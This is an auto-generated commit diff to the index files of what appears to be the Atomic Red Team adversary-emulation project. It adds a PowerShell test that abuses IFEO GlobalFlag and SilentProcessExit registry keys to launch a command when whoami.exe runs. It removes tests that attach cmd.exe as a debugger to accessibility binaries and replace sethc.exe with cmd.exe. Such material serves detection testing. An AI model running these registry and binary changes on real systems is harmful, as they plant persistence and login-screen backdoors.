Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -517,8 +517,7 @@ privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persi
 privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
 privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
-privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
-privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
+privilege-escalation,T1546.012,Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
 privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1546.009,AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 privilege-escalation,T1547.015,Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
@@ -745,8 +744,7 @@ persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistenc
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
-persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
-persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
+persistence,T1546.012,Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
 persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -381,8 +381,7 @@ privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persi
 privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
 privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
-privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
-privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
+privilege-escalation,T1546.012,Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
 privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1546.009,AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
@@ -550,8 +549,7 @@ persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence -
 persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
 persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
-persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
-persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
+persistence,T1546.012,Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
 persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -792,11 +792,10 @@
 - [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
   - Atomic Test #1: IFEO Add Debugger [windows]
   - Atomic Test #2: IFEO Global Flags [windows]
+  - Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
 - T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
-  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
-  - Atomic Test #2: Replace binary of sticky keys [windows]
+- T1546.008 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
@@ -1228,11 +1227,10 @@
 - [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
   - Atomic Test #1: IFEO Add Debugger [windows]
   - Atomic Test #2: IFEO Global Flags [windows]
+  - Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
 - T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
-  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
-  - Atomic Test #2: Replace binary of sticky keys [windows]
+- T1546.008 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1136.002 Domain Account](../../T1136.002/T1136.002.md)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -591,11 +591,10 @@
 - [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
   - Atomic Test #1: IFEO Add Debugger [windows]
   - Atomic Test #2: IFEO Global Flags [windows]
+  - Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
 - T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
-  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
-  - Atomic Test #2: Replace binary of sticky keys [windows]
+- T1546.008 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
@@ -902,11 +901,10 @@
 - [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
   - Atomic Test #1: IFEO Add Debugger [windows]
   - Atomic Test #2: IFEO Global Flags [windows]
+  - Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
 - T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
-  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
-  - Atomic Test #2: Replace binary of sticky keys [windows]
+- T1546.008 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1136.002 Domain Account](../../T1136.002/T1136.002.md)

atomics/Indexes/Matrices/matrix.md

@@ -59,7 +59,7 @@
 |  | PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Timestomp](../../T1070.006/T1070.006.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
 |  |  | [Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Web Shell](../../T1505.003/T1505.003.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) |  |  |  |  |  |  |
+|  |  | [Web Shell](../../T1505.003/T1505.003.md) | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) |  |  |  |  |  |  |
 |  |  | [Default Accounts](../../T1078.001/T1078.001.md) | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [CMSTP](../../T1218.003/T1218.003.md) | [Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
 |  |  | [Time Providers](../../T1547.003/T1547.003.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
 |  |  | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
@@ -81,7 +81,7 @@
 |  |  | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Group Policy Modification](../../T1484.001/T1484.001.md) |  |  |  |  |  |  |  |
 |  |  | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Default Accounts](../../T1078.001/T1078.001.md) |  |  |  |  |  |  |  |
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | [Accessibility Features](../../T1546.008/T1546.008.md) | [Systemd Timers](../../T1053.006/T1053.006.md) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) |  |  |  |  |  |  |  |
 |  |  | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) |  |  |  |  |  |  |  |
 |  |  | [Domain Account](../../T1136.002/T1136.002.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -44,7 +44,7 @@
 |  |  | [Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [System Binary Proxy Execution](../../T1218/T1218.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) |  |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
 |  |  | [Web Shell](../../T1505.003/T1505.003.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Default Accounts](../../T1078.001/T1078.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Timestomp](../../T1070.006/T1070.006.md) | [Forced Authentication](../../T1187/T1187.md) |  |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | [Time Providers](../../T1547.003/T1547.003.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Reflective Code Loading](../../T1620/T1620.md) | Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | [Internal Proxy](../../T1090.001/T1090.001.md) |  |
+|  |  | [Time Providers](../../T1547.003/T1547.003.md) | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | [Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Local Account](../../T1136.001/T1136.001.md) | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -57,7 +57,7 @@
 |  |  | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Rogue Domain Controller](../../T1207/T1207.md) | [Kerberoasting](../../T1558.003/T1558.003.md) |  |  |  |  |  |  |
 |  |  | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DCSync](../../T1003.006/T1003.006.md) |  |  |  |  |  |  |
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
-|  |  | [Accessibility Features](../../T1546.008/T1546.008.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) |  |  |  |  |  |  |
+|  |  | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) |  |  |  |  |  |  |
 |  |  | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) |  |  |  |  |  |  |  |
 |  |  | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Domain Account](../../T1136.002/T1136.002.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Group Policy Modification](../../T1484.001/T1484.001.md) |  |  |  |  |  |  |  |

atomics/Indexes/index.yaml

@@ -33762,6 +33762,47 @@ privilege-escalation:
           reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1
         name: command_prompt
         elevation_required: true
+    - name: GlobalFlags in Image File Execution Options
+      auto_generated_guid: 13117939-c9b2-4a43-999e-0a543df92f0d
+      description: "The following Atomic Test will create a GlobalFlag key under Image
+        File Execution Options, also a SilentProcessExit Key with ReportingMode and
+        MonitorProcess values. This test is similar to a recent CanaryToken that will
+        generate an EventCode 3000 in the Application log when a command, whoami.exe
+        for example, is executed.\nUpon running Whoami.exe, a command shell will spawn
+        and start calc.exe based on the MonitorProcess value. \nUpon successful execution,
+        powershell will modify the registry and spawn calc.exe. An event 3000 will
+        generate in the Application log.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        process:
+          description: 'Process to monitor
+
+            '
+          type: String
+          default: whoami.exe
+        cmd_to_run:
+          description: 'Command to execute
+
+            '
+          type: String
+          default: cmd.exe /c calc.exe
+      executor:
+        command: "$Name = \"GlobalFlag\"\n$Value = \"512\"\n$registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows
+          NT\\CurrentVersion\\Image File Execution Options\\#{process}\"\nNew-Item
+          -Path $registryPath -Force\nNew-ItemProperty -Path $registryPath -Name $Name
+          -Value $Value -PropertyType DWord -Force\n$Name = \"ReportingMode\"\n$Value
+          = \"1\"\n$SilentProcessExit = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{process}\"\nNew-Item
+          -Path $SilentProcessExit -Force\nNew-ItemProperty -Path $SilentProcessExit
+          -Name $Name -Value $Value -PropertyType DWord -Force \n\n$Name = \"MonitorProcess\"\n$Value
+          = \"#{cmd_to_run}\"\nNew-ItemProperty -Path $SilentProcessExit -Name $Name
+          -Value $Value -PropertyType String -Force\nStart-Process whoami.exe\n"
+        cleanup_command: "$SilentProcessExit = \"HKLM:\\SOFTWARE\\Microsoft\\Windows
+          NT\\CurrentVersion\\SilentProcessExit\\#{process}\" \nRemove-Item $SilentProcessExit
+          -force\n$registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image
+          File Execution Options\\#{process}\"\nRemove-Item $registryPath -force\n"
+        name: powershell
+        elevation_required: true
   T1055.013:
     technique:
       x_mitre_platforms:
@@ -34005,77 +34046,7 @@ privilege-escalation:
       - Administrator
       x_mitre_effective_permissions:
       - SYSTEM
-      identifier: T1546.008
-    atomic_tests:
-    - name: Attaches Command Prompt as a Debugger to a List of Target Processes
-      auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9
-      description: |
-        Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.
-
-        Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.
-      supported_platforms:
-      - windows
-      input_arguments:
-        parent_list:
-          description: 'Comma separated list of system binaries to which you want
-            to attach each #{attached_process}. Default: "osk.exe"
-
-            '
-          type: String
-          default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
-            atbroker.exe
-        attached_process:
-          description: 'Full path to process to attach to target in #{parent_list}.
-            Default: cmd.exe
-
-            '
-          type: Path
-          default: C:\windows\system32\cmd.exe
-      executor:
-        command: |
-          $input_table = "#{parent_list}".split(",")
-          $Name = "Debugger"
-          $Value = "#{attached_process}"
-          Foreach ($item in $input_table){
-            $item = $item.trim()
-            $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
-            IF(!(Test-Path $registryPath))
-            {
-              New-Item -Path $registryPath -Force
-              New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-            }
-            ELSE
-            {
-              New-ItemProperty -Path $registryPath -Name $name -Value $Value
-            }
-          }
-        cleanup_command: |
-          $input_table = "#{parent_list}".split(",")
-          Foreach ($item in $input_table)
-          {
-            $item = $item.trim()
-            reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null
-          }
-        name: powershell
-        elevation_required: true
-    - name: Replace binary of sticky keys
-      auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
-      description: 'Replace sticky keys binary (sethc.exe) with cmd.exe
-
-        '
-      supported_platforms:
-      - windows
-      executor:
-        command: |
-          copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
-          takeown /F C:\Windows\System32\sethc.exe /A
-          icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
-          copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
-        cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
-
-          '
-        name: command_prompt
-        elevation_required: true
+    atomic_tests: []
   T1504:
     technique:
       x_mitre_platforms:
@@ -55133,6 +55104,47 @@ persistence:
           reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1
         name: command_prompt
         elevation_required: true
+    - name: GlobalFlags in Image File Execution Options
+      auto_generated_guid: 13117939-c9b2-4a43-999e-0a543df92f0d
+      description: "The following Atomic Test will create a GlobalFlag key under Image
+        File Execution Options, also a SilentProcessExit Key with ReportingMode and
+        MonitorProcess values. This test is similar to a recent CanaryToken that will
+        generate an EventCode 3000 in the Application log when a command, whoami.exe
+        for example, is executed.\nUpon running Whoami.exe, a command shell will spawn
+        and start calc.exe based on the MonitorProcess value. \nUpon successful execution,
+        powershell will modify the registry and spawn calc.exe. An event 3000 will
+        generate in the Application log.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        process:
+          description: 'Process to monitor
+
+            '
+          type: String
+          default: whoami.exe
+        cmd_to_run:
+          description: 'Command to execute
+
+            '
+          type: String
+          default: cmd.exe /c calc.exe
+      executor:
+        command: "$Name = \"GlobalFlag\"\n$Value = \"512\"\n$registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows
+          NT\\CurrentVersion\\Image File Execution Options\\#{process}\"\nNew-Item
+          -Path $registryPath -Force\nNew-ItemProperty -Path $registryPath -Name $Name
+          -Value $Value -PropertyType DWord -Force\n$Name = \"ReportingMode\"\n$Value
+          = \"1\"\n$SilentProcessExit = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{process}\"\nNew-Item
+          -Path $SilentProcessExit -Force\nNew-ItemProperty -Path $SilentProcessExit
+          -Name $Name -Value $Value -PropertyType DWord -Force \n\n$Name = \"MonitorProcess\"\n$Value
+          = \"#{cmd_to_run}\"\nNew-ItemProperty -Path $SilentProcessExit -Name $Name
+          -Value $Value -PropertyType String -Force\nStart-Process whoami.exe\n"
+        cleanup_command: "$SilentProcessExit = \"HKLM:\\SOFTWARE\\Microsoft\\Windows
+          NT\\CurrentVersion\\SilentProcessExit\\#{process}\" \nRemove-Item $SilentProcessExit
+          -force\n$registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image
+          File Execution Options\\#{process}\"\nRemove-Item $registryPath -force\n"
+        name: powershell
+        elevation_required: true
   T1177:
     technique:
       x_mitre_platforms:
@@ -55334,77 +55346,7 @@ persistence:
       - Administrator
       x_mitre_effective_permissions:
       - SYSTEM
-      identifier: T1546.008
-    atomic_tests:
